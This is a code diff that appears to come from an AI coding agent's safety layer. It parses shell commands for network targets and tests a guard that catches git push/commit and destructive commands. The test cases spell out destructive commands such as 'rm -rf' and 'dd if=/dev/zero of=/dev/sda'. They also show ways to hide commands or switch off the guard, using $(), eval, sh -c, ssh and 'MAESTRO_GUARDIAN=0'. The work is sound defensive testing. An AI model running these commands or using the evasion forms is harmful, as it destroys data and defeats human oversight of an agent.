+		return true;
+	}
+	return false;
+}
+
+function targetToUrl(value: string): string | null {
+	let target = value.trim().replace(/^["']|["']$/g, "");
+	if (!looksLikeHostTarget(target)) {
+		return null;
+	}
+
+	const scpStyleMatch = target.match(/^[^@\s]+@([^:/\s]+):/);
+	if (scpStyleMatch?.[1]) {
+		target = scpStyleMatch[1];
+	} else {
+		const sshUserHostMatch = target.match(
+			/^[^@\s]+@([^:/\s]+)((?::\d+)?(?:\/.*)?)$/i,
+		);
+		if (sshUserHostMatch?.[1]) {
+			target = `${sshUserHostMatch[1]}${sshUserHostMatch[2] ?? ""}`;
+		}
+	}
+
+	if (!/^https?:\/\//i.test(target)) {
+		target = `http://${target}`;
+	}
+
+	return cleanExtractedUrl(target);
+}
+
+function isLocalGitTarget(value: string): boolean {
+	const target = value.trim().replace(/^["']|["']$/g, "");
+	return (
+		target === "." ||
+		target === ".." ||
+		target.startsWith("./") ||
+		target.startsWith("../") ||
+		target.startsWith("/") ||
+		target.startsWith("~/") ||
+		target.startsWith("file://")
+	);
+}
+
+function hasShellExpansion(value: string): boolean {
+	return /[$`]|[<>]\(/.test(value);
+}
+
+function networkFlagTakesValue(commandName: string, flag: string): boolean {
+	if (commandName === "curl" && (flag === "-i" || flag === "-p")) {
+		return false;
+	}
+
+	return FLAGS_WITH_VALUES.has(flag);
+}
+
+function nonFlagArgs(commandName: string, args: string[]): string[] {
+	const values: string[] = [];
+	let skipNext = false;
+
+	for (const arg of args) {
+		if (skipNext) {
+			skipNext = false;
+			continue;
+		}
+
+		if (arg.startsWith("-")) {
+			if (!arg.includes("=") && networkFlagTakesValue(commandName, arg)) {
+				skipNext = true;
+			}
+			continue;
+		}
+
+		values.push(arg);
+	}
+
+	return values;
+}
+
+function gitCloneNonFlagArgs(args: string[]): string[] {
+	return gitNonFlagArgs(args, GIT_CLONE_FLAGS_WITH_VALUES);
+}
+
+function gitNonFlagArgs(
+	args: string[],
+	flagsWithValues: Set<string>,
+): string[] {
+	const values: string[] = [];
+	let skipNext = false;
+	let optionsEnded = false;
+
+	for (const arg of args) {
+		if (skipNext) {
+			skipNext = false;
+			continue;
+		}
+
+		if (!optionsEnded && arg === "--") {
+			optionsEnded = true;
+			continue;
+		}
+
+		if (!optionsEnded && arg.startsWith("-")) {
+			const [flag] = arg.split("=", 1);
+			if (flag && flagsWithValues.has(flag) && !arg.includes("=")) {
+				skipNext = true;
+			}
+			continue;
+		}
+
+		values.push(arg);
+	}
+
+	return values;
+}
+
+function gitRemoteTargetArgs(args: string[]): string[] {
+	const targets = gitNonFlagArgs(args, GIT_REMOTE_ADD_FLAGS_WITH_VALUES);
+	const action = targets[0]?.toLowerCase();
+	if (action === "add") {
+		return targets.slice(2, 3);
+	}
+	if (action === "set-url") {
+		return targets.slice(2);
+	}
+	if (action && !GIT_REMOTE_LOCAL_ACTIONS.has(action)) {
+		return targets.slice(0, 1);
+	}
+	return [];
+}
+
+function gitConfigTargetArgs(args: string[]): string[] {
+	const targets = gitNonFlagArgs(args, GIT_CONFIG_FLAGS_WITH_VALUES);
+	const key = targets[0];
+	if (!key || targets.length < 2) {
+		return [];
+	}
+
+	const rewriteTarget = key.match(
+		/^url\.(.+)\.(?:insteadof|pushinsteadof)$/i,
+	)?.[1];
+	if (rewriteTarget) {
+		return [rewriteTarget];
+	}
+
+	if (
+		/^remote\..+\.(?:push)?url$/i.test(key) ||
+		/^submodule\..+\.url$/i.test(key)
+	) {
+		return targets.slice(1, 2);
+	}
+
+	return [];
+}
+
+function gitConfigCommandIsLocal(args: string[]): boolean {
+	return gitConfigTargetArgs(args).length === 0;
+}
+
+function gitRemoteCommandIsLocal(args: string[]): boolean {
+	const targets = gitNonFlagArgs(args, GIT_REMOTE_ADD_FLAGS_WITH_VALUES);
+	const action = targets[0]?.toLowerCase();
+	if (!action || GIT_REMOTE_LOCAL_ACTIONS.has(action)) {
+		return true;
+	}
+	if (action === "add") {
+		return targets.length < 3;
+	}
+	if (action === "set-url") {
+		return targets.length < 3;
+	}
+	return false;
+}
+
+function gitSubmoduleTargetArgs(args: string[]): string[] {
+	const targets = gitNonFlagArgs(args, GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES);
+	const action = targets[0]?.toLowerCase();
+	if (!action || GIT_SUBMODULE_LOCAL_ACTIONS.has(action)) {
+		return [];
+	}
+	if (action === "add") {
+		return targets.slice(1, 2);
+	}
+	return targets.slice(0, 1);
+}
+
+function gitSubmoduleCommandIsLocal(args: string[]): boolean {
+	const targets = gitNonFlagArgs(args, GIT_SUBMODULE_ADD_FLAGS_WITH_VALUES);
+	const action = targets[0]?.toLowerCase();
+	return !action || GIT_SUBMODULE_LOCAL_ACTIONS.has(action);
+}
+
+function gitArchiveTargetArgs(args: string[]): string[] {
+	const targets: string[] = [];
+
+	for (let index = 0; index < args.length; index += 1) {
+		const arg = args[index]!;
+		if (arg === "--remote" && index + 1 < args.length) {
+			targets.push(args[index + 1]!);
+			index += 1;
+			continue;
+		}
+		if (arg.startsWith("--remote=")) {
+			const target = arg.slice("--remote=".length);
+			if (target) {
+				targets.push(target);
+			}
+		}
+	}
+
+	return targets;
+}
+
+function networkTargetArgs(
+	commandName: string,
+	args: string[],
+	gitSubcommand: string | null,
+): string[] {
+	const targets =
+		commandName === "git" && gitSubcommand === "clone"
+			? gitCloneNonFlagArgs(args)
+			: nonFlagArgs(commandName, args);
+
+	if (commandName === "git") {
+		if (gitSubcommand === "archive") {
+			return gitArchiveTargetArgs(args);
+		}
+		if (gitSubcommand === "config") {
+			return gitConfigTargetArgs(args);
+		}
+		if (gitSubcommand === "remote") {
+			return gitRemoteTargetArgs(args);
+		}
+		if (gitSubcommand === "submodule") {
+			return gitSubmoduleTargetArgs(args);
+		}
+		return targets.slice(0, 1);
+	}
+
+	if (
+		commandName === "nc" ||
+		commandName === "ncat" ||
+		commandName === "netcat" ||
+		commandName === "ssh" ||
+		commandName === "sftp" ||
+		commandName === "telnet" ||
+		commandName === "ftp"
+	) {
+		return targets.slice(0, 1);
+	}
+
+	return targets;
+}
+
+function nextGitSubcommandToken(
+	args: string[],
+): { subcommand: string; args: string[] } | null {
+	for (let index = 0; index < args.length; index += 1) {
+		const arg = args[index]!;
+		if (arg === "--") {
+			continue;
+		}
+
+		const [flag] = arg.split("=", 1);
+		if (
+			flag &&
+			GIT_GLOBAL_FLAGS_WITH_VALUES.has(flag) &&
+			!arg.includes("=") &&
+			index + 1 < args.length
+		) {
+			index += 1;
+			continue;
+		}
+		if (arg.startsWith("-c") && arg !== "-c") {
+			continue;
+		}
+		if (arg.startsWith("--")) {
+			continue;
+		}
+		if (arg.startsWith("-")) {
+			continue;
+		}
+
+		const subcommand = arg.toLowerCase();
+		return { subcommand, args: args.slice(index + 1) };
+	}
+
+	return null;
+}
+
+function gitSubcommandInvocation(
+	args: string[],
+): { subcommand: string; args: string[] } | null {
+	const invocation = nextGitSubcommandToken(args);
+	if (!invocation) {
+		return null;
+	}
+
+	if (NETWORK_GIT_SUBCOMMANDS.has(invocation.subcommand)) {
+		return invocation;
+	}
+
+	if (!GIT_NESTED_SUBCOMMAND_WRAPPERS.has(invocation.subcommand)) {
+		return null;
+	}
+
+	const nestedInvocation = nextGitSubcommandToken(invocation.args);
+	return nestedInvocation &&
+		NETWORK_GIT_SUBCOMMANDS.has(nestedInvocation.subcommand)
+		? nestedInvocation
+		: null;
+}
 
 /**
  * Extract URLs from any value recursively.
@@ -50,7 +1301,7 @@ export function extractUrlsFromValue(value: unknown): string[] {
 			if (matches) {
 				for (const match of matches) {
 					// Trim common trailing punctuation that gets captured
-					urls.push(match.replace(/[)}\],.;:]+$/, ""));
+					urls.push(cleanExtractedUrl(match));
 				}
 			}
 		} else if (Array.isArray(val)) {
@@ -90,87 +1341,96 @@ export function extractUrlsFromValue(value: unknown): string[] {
 export function extractUrlsFromShellCommand(command: string): string[] {
 	const urls: string[] = [];
 
-	// Flags that take a value as the next argument
-	const FLAGS_WITH_VALUES = new Set([
-		"-X",
-		"--request",
-		"-o",
-		"-O",
-		"--output",
-		"-H",
-		"--header",
-		"-d",
-		"--data",
-		"--data-raw",
-		"--data-binary",
-		"--data-urlencode",
-		"-F",
-		"--form",
-		"-A",
-		"--user-agent",
-		"-u",
-		"--user",
-		"-T",
-		"--upload-file",
-		"-e",
-		"--referer",
-		"-b",
-		"--cookie",
-		"-c",
-		"--cookie-jar",
-		"-K",
-		"--config",
-		"--resolve",
-		"--connect-to",
-		"--max-time",
-		"-m",
-		"--retry",
-		"--retry-delay",
-		"-w",
-		"--write-out",
-	]);
-
-	const matches = command.matchAll(new RegExp(CURL_WGET_PATTERN));
-	for (const match of matches) {
-		const argsStr = match[1];
-		if (!argsStr) continue;
-		// Split by spaces, respecting quotes
-		const argParts = argsStr.match(/(?:[^\s"']+|"[^"]*"|'[^']*')+/g) || [];
-
-		let skipNext = false;
-		for (const arg of argParts) {
-			const stripped = arg.replace(/^["']|["']$/g, ""); // strip quotes
-
-			// Skip flag values (arg after a flag that takes a value)
-			if (skipNext) {
-				skipNext = false;
+	for (const segment of allCommandSegments(command)) {
+		const invocation = unwrapNetworkInvocation(segment);
+		if (!invocation) {
+			continue;
+		}
+
+		let args = invocation.args;
+		let gitSubcommand: string | null = null;
+		if (invocation.commandName === "git") {
+			const gitInvocation = gitSubcommandInvocation(args);
+			if (!gitInvocation) {
 				continue;
 			}
+			args = gitInvocation.args;
+			gitSubcommand = gitInvocation.subcommand;
+		}
 
-			// Skip flags, but check if they take a value
-			if (stripped.startsWith("-")) {
-				// Handle both --flag=value and --flag value forms
-				if (stripped.includes("=")) {
-					// Flag with embedded value like --output=file.txt, skip entirely
-					continue;
-				}
-				if (FLAGS_WITH_VALUES.has(stripped)) {
-					skipNext = true;
-				}
+		for (const arg of networkTargetArgs(
+			invocation.commandName,
+			args,
+			gitSubcommand,
+		)) {
+			const url = targetToUrl(arg);
+			if (url) {
+				urls.push(url);
+			}
+		}
+	}
+
+	return [...new Set(urls)];
+}
+
+export function findOpaqueNetworkShellCommand(command: string): string | null {
+	for (const segment of allCommandSegments(command)) {
+		const invocation = unwrapNetworkInvocation(segment);
+		if (!invocation) {
+			continue;
+		}
+
+		let args = invocation.args;
+		let gitSubcommand: string | null = null;
+		if (invocation.commandName === "git") {
+			const gitInvocation = gitSubcommandInvocation(args);
+			if (!gitInvocation) {
 				continue;
 			}
+			args = gitInvocation.args;
+			gitSubcommand = gitInvocation.subcommand;
+		}
+
+		const targets = networkTargetArgs(
+			invocation.commandName,
+			args,
+			gitSubcommand,
+		);
+		if (
+			targets.length === 0 &&
+			invocation.commandName === "git" &&
+			(gitSubcommand === "archive" ||
+				(gitSubcommand === "config" && gitConfigCommandIsLocal(args)) ||
+				(gitSubcommand === "remote" && gitRemoteCommandIsLocal(args)) ||
+				(gitSubcommand === "submodule" && gitSubmoduleCommandIsLocal(args)))
+		) {
+			continue;
+		}
 
-			// Add http:// if no protocol specified (skip whitespace-only to avoid "http://")
-			let url = stripped?.trim() ?? "";
-			if (!url) continue;
-			if (!/^https?:\/\//i.test(url)) {
-				url = `http://${url}`;
+		if (targets.length > 0) {
+			if (
+				URL_POSITIONAL_COMMANDS.has(invocation.commandName) &&
+				targets.some((arg) => targetToUrl(arg)) &&
+				targets.every((arg) => targetToUrl(arg) || !hasShellExpansion(arg))
+			) {
+				continue;
+			}
+
+			const allTargetsAreStatic = targets.every((arg) => {
+				if (targetToUrl(arg)) {
+					return true;
+				}
+				return invocation.commandName === "git" && isLocalGitTarget(arg);
+			});
+			if (allTargetsAreStatic) {
+				continue;
 			}
-			urls.push(url.replace(/[)}\],.;:]+$/, ""));
 		}
+
+		return invocation.display.join(" ");
 	}
 
-	return urls;
+	return null;
 }
 
 /**
diff --git a/test/guardian/guardian-runner.test.ts b/test/guardian/guardian-runner.test.ts
index 0d300c8b3..99189120b 100644
--- a/test/guardian/guardian-runner.test.ts
+++ b/test/guardian/guardian-runner.test.ts
@@ -96,15 +96,199 @@ describe("guardian runner", () => {
 		Reflect.deleteProperty(process.env, "MAESTRO_GUARDIAN");
 	});
 
-	it("respects inline disable flag for commit/push detection", () => {
-		const result = shouldGuardCommand('MAESTRO_GUARDIAN=0 git commit -m "msg"');
-		expect(result.shouldGuard).toBe(false);
+	it("ignores inline disable text for commit/push detection", () => {
+		const commented = shouldGuardCommand(
+			"git push origin main # MAESTRO_GUARDIAN=0",
+		);
+		expect(commented.shouldGuard).toBe(true);
+		expect(commented.trigger).toBe("git push");
+
+		const assignment = shouldGuardCommand(
+			'MAESTRO_GUARDIAN=0 git commit -m "msg"',
+		);
+		expect(assignment.shouldGuard).toBe(true);
+		expect(assignment.trigger).toBe("git commit");
+	});
+
+	it("detects wrapped git commands", () => {
+		const cases = [
+			{ command: "git -C packages/tui-rs push", trigger: "git push" },
+			{ command: "command git push origin main", trigger: "git push" },
+			{ command: 'command -- git commit -m "msg"', trigger: "git commit" },
+			{ command: 'sudo -- git commit -m "msg"', trigger: "git commit" },
+			{ command: "sudo -u root -- git push origin main", trigger: "git push" },
+			{ command: "/usr/bin/git push origin main", trigger: "git push" },
+			{ command: '( git commit -m "msg" )', trigger: "git commit" },
+			{ command: 'echo "$(git commit -m msg)"', trigger: "git commit" },
+			{ command: "echo $(git push origin main)", trigger: "git push" },
+			{ command: "echo `git push origin main`", trigger: "git push" },
+			{ command: "cat <(git push origin main)", trigger: "git push" },
+			{ command: "diff <(echo ok) <(rm -rf /tmp/x)", trigger: "rm -rf" },
+			{ command: "echo $(rm -rf /tmp/x)", trigger: "rm -rf" },
+			{ command: "echo `rm -r /tmp/x`", trigger: "rm -r" },
+			{ command: "echo $(echo $(git push origin main))", trigger: "git push" },
+			{ command: "echo $(echo $(rm -rf /tmp/x))", trigger: "rm -rf" },
+			{ command: "eval 'git push origin main'", trigger: "git push" },
+			{ command: 'eval "rm -rf /tmp/x"', trigger: "rm -rf" },
+			{
+				command: 'env GIT_CONFIG_GLOBAL=/tmp/gitconfig git commit -m "msg"',
+				trigger: "git commit",
+			},
+		];
+
+		for (const { command, trigger } of cases) {
+			const result = shouldGuardCommand(command);
+			expect(result.shouldGuard).toBe(true);
+			expect(result.trigger).toBe(trigger);
+		}
+	});
+
+	it("detects guarded commands past shallow substitution nesting", () => {
+		let gitCommand = "git push origin main";
+		let rmCommand = "rm -rf /tmp/x";
+		for (let index = 0; index < 12; index += 1) {
+			gitCommand = `echo $(${gitCommand})`;
+			rmCommand = `echo $(${rmCommand})`;
+		}
+
+		expect(shouldGuardCommand(gitCommand)).toEqual({
+			shouldGuard: true,
+			trigger: "git push",
+		});
+		expect(shouldGuardCommand(rmCommand)).toEqual({
+			shouldGuard: true,
+			trigger: "rm -rf",
+		});
+	});
+
+	it("detects later guarded git commands in a token sequence", () => {
+		const cases = [
+			{
+				command: "git submodule foreach git commit -m update",
+				trigger: "git commit",
+			},
+			{
+				command: `sh -c 'git status
+git commit -m "msg"'`,
+				trigger: "git commit",
+			},
+		];
+
+		for (const { command, trigger } of cases) {
+			const result = shouldGuardCommand(command);
+			expect(result.shouldGuard).toBe(true);
+			expect(result.trigger).toBe(trigger);
+		}
+	});
+
+	it("detects guarded commands inside shell -c scripts", () => {
+		const cases = [
+			{ command: `sh -c 'git commit -m "msg"'`, trigger: "git commit" },
+			{ command: `sh -c'git push origin main'`, trigger: "git push" },
+			{ command: `sh.exe -c 'git push origin main'`, trigger: "git push" },
+			{ command: `bash -lc 'git push origin main'`, trigger: "git push" },
+			{ command: `bash -lc'git push origin main'`, trigger: "git push" },
+			{ command: `fish -c 'git push origin main'`, trigger: "git push" },
+			{
+				command: `bash -norc -c 'git push origin main'`,
+				trigger: "git push",
+			},
+			{ command: `su -c 'git push origin main'`, trigger: "git push" },
+			{
+				command: `docker run image sh -c 'git push origin main'`,
+				trigger: "git push",
+			},
+			{
+				command: `docker run --rm ubuntu sh -c 'git commit -m "msg"'`,
+				trigger: "git commit",
+			},
+			{ command: `bash -c 'rm -rf /tmp/x'`, trigger: "rm -rf" },
+			{ command: `sh -c'rm -rf /tmp/x'`, trigger: "rm -rf" },
+			{ command: `sh -c -- 'rm -rf /tmp/x'`, trigger: "rm -rf" },
+			{ command: `sh -ec 'rm -r /tmp/y'`, trigger: "rm -r" },
+			{ command: `sh -cx 'git push origin main'`, trigger: "git push" },
+			{ command: `bash -xce 'git commit -m "msg"'`, trigger: "git commit" },
+			{ command: `fish -c 'git push origin main'`, trigger: "git push" },
+			{ command: `su -c 'git push origin main'`, trigger: "git push" },
+			{ command: `su root -c 'git commit -m "msg"'`, trigger: "git commit" },
+			{
+				command: `ssh deploy@example.com 'git push origin main'`,
+				trigger: "git push",
+			},
+			{
+				command: `ssh deploy@example.com'git push origin main'`,
+				trigger: "git push",
+			},
+			{
+				command: `ssh -p 2222 host 'git commit -m "msg"'`,
+				trigger: "git commit",
+			},
+			{ command: `ssh host 'rm -rf /tmp/x'`, trigger: "rm -rf" },
+			{ command: `sh -c 'echo $(git push origin main)'`, trigger: "git push" },
+			{ command: `eval 'echo $(rm -rf /tmp/x)'`, trigger: "rm -rf" },
+		];
+
+		for (const { command, trigger } of cases) {
+			const result = shouldGuardCommand(command);
+			expect(result.shouldGuard).toBe(true);
+			expect(result.trigger).toBe(trigger);
+		}
+	});
+
+	it("detects guarded substitutions inside inline shell scripts", () => {
+		const cases = [
+			{
+				command: `sh -c 'echo $(git push origin main)'`,
+				trigger: "git push",
+			},
+			{
+				command: `bash -lc 'echo $(git commit -m "msg")'`,
+				trigger: "git commit",
+			},
+			{
+				command: `eval 'echo $(rm -rf /tmp/x)'`,
+				trigger: "rm -rf",
+			},
+		];
+
+		for (const { command, trigger } of cases) {
+			const result = shouldGuardCommand(command);
+			expect(result.shouldGuard).toBe(true);
+			expect(result.trigger).toBe(trigger);
+		}
+	});
+
+	it("detects guarded quoted command args for non-shell launchers", () => {
+		const cases = [
+			{
+				command: `ssh host 'git push origin main'`,
+				trigger: "git push",
+			},
+			{
+				command: `runuser -u deploy -- 'git commit -m "msg"'`,
+				trigger: "git commit",
+			},
+			{
+				command: `script -qc 'rm -rf /tmp/x' /dev/null`,
+				trigger: "rm -rf",
+			},
+		];
+
+		for (const { command, trigger } of cases) {
+			const result = shouldGuardCommand(command);
+			expect(result.shouldGuard).toBe(true);
+			expect(result.trigger).toBe(trigger);
+		}
 	});
 
 	it("detects destructive commands", () => {
 		const commands = [
 			"rm -rf /tmp/x",
+			"/usr/bin/rm -rf /tmp/x",
+			"rm -fr /tmp/x",
+			"rm --recursive --force /tmp/x",
 			"sudo rm -r /tmp/y",
+			"find . -exec rm -rf {} ;",
 			"find . -delete",
 			"chmod 000 secret",
 			"dd if=/dev/zero of=/dev/sda",
@@ -117,14 +301,42 @@ describe("guardian runner", () => {
 		}
 	});
 
+	it("does not merge destructive regexes across command separators", () => {
+		const commands = ["find; echo -delete", "chmod; 000"];
+
+		for (const cmd of commands) {
+			const result = shouldGuardCommand(cmd);
+			expect(result.shouldGuard).toBe(false);
+			expect(result.trigger).toBeNull();
+		}
+	});
+
 	it("does not flag rm without recursive flag", () => {
-		const commands = ["rm -v /home/user/file.txt", "rm -i parent/child"];
+		const commands = [
+			"rm -v /home/user/file.txt",
+			"rm -i parent/child",
+			"rm -- -rf",
+			"rm -- --recursive --force",
+		];
 		for (const cmd of commands) {
 			const result = shouldGuardCommand(cmd);
 			expect(result.shouldGuard).toBe(false);
 		}
 	});
 
+	it("stops parsing rm options at double dash", () => {
+		const result = shouldGuardCommand("rm -r -- -f");
+
+		expect(result.shouldGuard).toBe(true);
+		expect(result.trigger).toBe("rm -r");
+	});
+
+	it("does not flag literal git commands in single-quoted strings", () => {
+		const result = shouldGuardCommand("echo '$(git push origin main)'");
+
+		expect(result.shouldGuard).toBe(false);
+	});
+
 	it("skips when MAESTRO_GUARDIAN=0 env is set", async () => {
 		process.env.MAESTRO_GUARDIAN = "0";
 		const result = await runGuardian({ target: "staged", trigger: "test" });
diff --git a/test/packages/core/daytona-sandbox-edge-cases.test.ts b/test/packages/core/daytona-sandbox-edge-cases.test.ts
index 4953b1527..3345ea950 100644
--- a/test/packages/core/daytona-sandbox-edge-cases.test.ts
+++ b/test/packages/core/daytona-sandbox-edge-cases.test.ts
@@ -185,6 +185,25 @@ describe("DaytonaSandbox Edge Cases", () => {
 		});
 	});
 
+	describe("abortable exec fallbacks", () => {
+		it("fails when abortable execution is requested without session APIs", async () => {
+			const handle = createMockHandle();
+			const sandbox = await createTestSandbox(handle);
+			const controller = new AbortController();
+
+			const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+
+			expect(result).toEqual({
+				stdout: "",
+				stderr: "Daytona abortable execution requires session API support",
+				exitCode: 1,
+			});
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+		});
+	});
+
 	describe("writeFile — edge cases", () => {
 		it("handles empty content", async () => {
 			const handle = createMockHandle();
diff --git a/test/packages/core/daytona-sandbox.test.ts b/test/packages/core/daytona-sandbox.test.ts
index 1eda6a93f..9009b820e 100644
--- a/test/packages/core/daytona-sandbox.test.ts
+++ b/test/packages/core/daytona-sandbox.test.ts
@@ -19,6 +19,18 @@ function createMockHandle() {
 				result: "output\n",
 				exitCode: 0,
 			}),
+			createSession: vi.fn().mockResolvedValue(undefined),
+			deleteSession: vi.fn().mockResolvedValue(undefined),
+			executeSessionCommand: vi.fn().mockResolvedValue({
+				cmdId: "cmd-123",
+			}),
+			getSessionCommand: vi.fn().mockResolvedValue({
+				exitCode: 0,
+			}),
+			getSessionCommandLogs: vi.fn().mockResolvedValue({
+				stdout: "output\n",
+				stderr: "",
+			}),
 		},
 		fs: {
 			downloadFile: vi.fn().mockResolvedValue(Buffer.from("file contents")),
@@ -175,6 +187,224 @@ describe("DaytonaSandbox", () => {
 			expect(result.stderr).toContain("sandbox unreachable");
 			expect(result.stdout).toBe("");
 		});
+
+		it("uses a session so abortable exec can be cancelled", async () => {
+			const handle = createMockHandle();
+			const sandbox = await createTestSandbox(handle);
+			const controller = new AbortController();
+
+			const result = await sandbox.exec(
+				"gh pr view 1",
+				"/tmp/workdir",
+				{ GH_TOKEN: "secret" },
+				controller.signal,
+			);
+
+			expect(result).toEqual({
+				stdout: "output\n",
+				stderr: "",
+				exitCode: 0,
+			});
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+			expect(handle.process.createSession).toHaveBeenCalledTimes(1);
+			expect(handle.process.executeSessionCommand).toHaveBeenCalledWith(
+				expect.any(String),
+				{
+					command: "cd '/tmp/workdir' && GH_TOKEN='secret' gh pr view 1",
+					runAsync: true,
+					suppressInputEcho: true,
+				},
+			);
+			expect(handle.process.deleteSession).toHaveBeenCalledTimes(1);
+		});
+
+		it("truncates abortable session output to the bash-sized buffer", async () => {
+			const handle = createMockHandle();
+			handle.process.getSessionCommandLogs.mockResolvedValue({
+				stdout: "a".repeat(50 * 1024),
+				stderr: "b".repeat(50 * 1024),
+			});
+			const sandbox = await createTestSandbox(handle);
+			const controller = new AbortController();
+
+			const result = await sandbox.exec(
+				"gh pr view 1",
+				undefined,
+				undefined,
+				controller.signal,
+			);
+
+			expect(result).toEqual({
+				stdout: "a".repeat(40 * 1024),
+				stderr: "b".repeat(40 * 1024),
+				exitCode: 0,
+			});
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+		});
+
+		it("falls back to executeCommand when signals are present but session APIs are unavailable", async () => {
+			const handle = createMockHandle();
+			handle.process.createSession = undefined as never;
+			handle.process.deleteSession = undefined as never;
+			handle.process.executeSessionCommand = undefined as never;
+			handle.process.getSessionCommand = undefined as never;
+			handle.process.getSessionCommandLogs = undefined as never;
+			const sandbox = await createTestSandbox(handle);
+			const controller = new AbortController();
+
+			const result = await sandbox.exec(
+				"echo hello",
+				undefined,
+				undefined,
+				controller.signal,
+			);
+
+			expect(result).toEqual({
+				stdout: "output\n",
+				stderr: "",
+				exitCode: 0,
+			});
+			expect(handle.process.executeCommand).toHaveBeenCalledWith("echo hello");
+		});
+	});
+
+	describe("execWithArgs", () => {
+		it("does not start fallback executeCommand when already aborted", async () => {
+			const handle = createMockHandle();
+			handle.process.createSession = undefined as never;
+			handle.process.deleteSession = undefined as never;
+			handle.process.executeSessionCommand = undefined as never;
+			handle.process.getSessionCommand = undefined as never;
+			handle.process.getSessionCommandLogs = undefined as never;
+			const controller = new AbortController();
+			controller.abort();
+			const sandbox = await createTestSandbox(handle);
+
+			const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+
+			expect(result.exitCode).toBe(1);
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+		});
+
+		it("fails before fallback executeCommand when abortable sessions are unavailable", async () => {
+			const handle = createMockHandle();
+			handle.process.createSession = undefined as never;
+			handle.process.deleteSession = undefined as never;
+			handle.process.executeSessionCommand = undefined as never;
+			handle.process.getSessionCommand = undefined as never;
+			handle.process.getSessionCommandLogs = undefined as never;
+			const controller = new AbortController();
+			const sandbox = await createTestSandbox(handle);
+
+			const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+
+			expect(result.exitCode).toBe(1);
+			expect(result.stderr).toContain(
+				"Daytona abortable execution requires session API support",
+			);
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+		});
+
+		it("deletes the remote session when the abort signal fires", async () => {
+			const handle = createMockHandle();
+			const controller = new AbortController();
+			handle.process.getSessionCommand.mockImplementation(
+				() =>
+					new Promise((_, reject) => {
+						controller.signal.addEventListener(
+							"abort",
+							() => reject(new Error("aborted")),
+							{ once: true },
+						);
+					}),
+			);
+			const sandbox = await createTestSandbox(handle);
+
+			const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+			controller.abort();
+
+			const result = await promise;
+
+			expect(result.exitCode).toBe(1);
+			expect(handle.process.executeCommand).not.toHaveBeenCalled();
+			expect(handle.process.createSession).toHaveBeenCalledTimes(1);
+			expect(handle.process.deleteSession).toHaveBeenCalledTimes(1);
+		});
+
+		it("retries session deletion when setup-time abort deletes too early", async () => {
+			const handle = createMockHandle();
+			const controller = new AbortController();
+			let resolveCreateSession!: () => void;
+			handle.process.createSession.mockReturnValue(
+				new Promise<void>((resolve) => {
+					resolveCreateSession = resolve;
+				}),
+			);
+			handle.process.deleteSession
+				.mockRejectedValueOnce(new Error("session not ready"))
+				.mockResolvedValueOnce(undefined);
+			const sandbox = await createTestSandbox(handle);
+
+			const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+			await Promise.resolve();
+			controller.abort();
+			await Promise.resolve();
+			resolveCreateSession();
+
+			const result = await promise;
+
+			expect(result.exitCode).toBe(1);
+			expect(handle.process.executeSessionCommand).not.toHaveBeenCalled();
+			expect(handle.process.deleteSession).toHaveBeenCalledTimes(2);
+		});
+
+		it("times out session commands that never complete", async () => {
+			vi.useFakeTimers();
+			try {
+				const handle = createMockHandle();
+				handle.process.getSessionCommand.mockResolvedValue({});
+				const sandbox = await createTestSandbox(handle);
+				const controller = new AbortController();
+
+				const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+					signal: controller.signal,
+				});
+				await vi.advanceTimersByTimeAsync(90_100);
+				const result = await promise;
+
+				expect(result.exitCode).toBe(1);
+				expect(result.stderr).toContain("timed out");
+				expect(handle.process.deleteSession).toHaveBeenCalledTimes(1);
+			} finally {
+				vi.useRealTimers();
+			}
+		});
+
+		it("returns a cancelled result when abort fires after completion is observed", async () => {
+			const handle = createMockHandle();
+			const controller = new AbortController();
+			handle.process.getSessionCommand.mockImplementation(async () => {
+				controller.abort();
+				return { exitCode: 0 };
+			});
+			const sandbox = await createTestSandbox(handle);
+
+			const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], {
+				signal: controller.signal,
+			});
+
+			expect(result).toEqual({ stdout: "", stderr: "", exitCode: 1 });
+			expect(handle.process.getSessionCommandLogs).not.toHaveBeenCalled();
+			expect(handle.process.deleteSession).toHaveBeenCalledTimes(1);
+		});
 	});
 
 	describe("readFile", () => {
diff --git a/test/safety/network-policy-validator.test.ts b/test/safety/network-policy-validator.test.ts
index 1b158bc86..964b5edb5 100644
--- a/test/safety/network-policy-validator.test.ts
+++ b/test/safety/network-policy-validator.test.ts
@@ -1,4 +1,5 @@
 import { beforeEach, describe, expect, it, vi } from "vitest";
+import type { ActionApprovalContext } from "../../src/agent/action-approval.js";
 
 const { lookupMock } = vi.hoisted(() => ({
 	lookupMock: vi.fn(),
@@ -8,7 +9,10 @@ vi.mock("node:dns/promises", () => ({
 	lookup: lookupMock,
 }));
 
-import { checkNetworkRestrictionsDetailed } from "../../src/safety/validators/network-policy-validator.js";
+import {
+	checkNetworkPolicy,
+	checkNetworkRestrictionsDetailed,
+} from "../../src/safety/validators/network-policy-validator.js";
 
 describe("network policy validator", () => {
 	beforeEach(() => {
@@ -51,6 +55,53 @@ describe("network policy validator", () => {
 		expect(lookupMock).not.toHaveBeenCalled();
 	});
 
+	it("blocks trailing-dot variants of denylisted hosts", async () => {
+		const result = await checkNetworkRestrictionsDetailed(
+			"https://internal.corp./data",
+			{ blockedHosts: ["internal.corp"] },
+		);
+		const repeatedDotResult = await checkNetworkRestrictionsDetailed(
+			"https://evil.com../data",
+			{ blockedHosts: ["evil.com"] },
+		);
+
+		expect(result.allowed).toBe(false);
+		expect(result.host).toBe("internal.corp");
+		expect(result.reason).toContain("blocked by enterprise policy");
+		expect(repeatedDotResult.allowed).toBe(false);
+		expect(repeatedDotResult.host).toBe("evil.com");
+		expect(repeatedDotResult.reason).toContain("blocked by enterprise policy");
